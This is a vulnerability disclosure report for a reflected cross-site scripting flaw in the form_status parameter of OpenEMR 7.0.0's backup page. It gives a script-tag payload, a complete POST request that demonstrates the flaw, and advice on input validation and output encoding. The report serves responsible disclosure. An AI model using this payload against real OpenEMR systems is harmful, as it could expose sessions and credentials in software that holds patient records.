We would like to report the vulnerability we found during software testing. The OpenEMR 7.0.0 (latest version) and below version Open Source electronic health records and medical practice management application has Reflected Cross Site Scripting vulnerability in the {form_status} parameter on backup page that never been reported before (Weβve checked from CVE Official website).
Reflected Cross Site-Scripting (XSS)
> https://<openemrurl>/interface/main/backup.php {form_status}
' /><script>alert(`CVE_Hunting_XSS`)</script>
> /var/www/localhost/htdocs/openemr/interface/main/backup.php (Please see more details in the occurrences section)
This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Whitelist validation at server side should be performed for all input fields and parameters in the entire application to ensure that only valid input is processed. The validation should decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input. Special characters such as `β/;&*()%!+{}[]|# including Carriage Return (ASCII 1, \r, %0d) as well as Line Feed (ASCII 10, \n, %0a) should be filtered out prior to server processing form fields and hidden form fields. In case special characters should be allowed into an input field, the application should use a standard function to βescapeβ the special characters. Alternatively, all parameters returned to the userβs browser should be sanitized so that client-side scripting attacks would not be effective. Output HTML encoding should be properly implemented to prevent execution of malicious script on userβs browser.
POST /interface/main/backup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134273974110212498243185026588
Content-Length: 626
Origin: https://localhost
Connection: close
Referer: https://localhost/interface/main/backup.php
Cookie: OpenEMR=sDB13cXmxjjPS6d-BF8dtr9D5Kj8PkbOg2oMdxqSKMMo1C7Y
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="csrf_token_form"
4a2e4c79d44d123017f7ff6850e337c8c17557e3
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_backup"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_step"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_status"
' /><script>alert(`CVE_Hunting_XSS`)</script>
-----------------------------134273974110212498243185026588--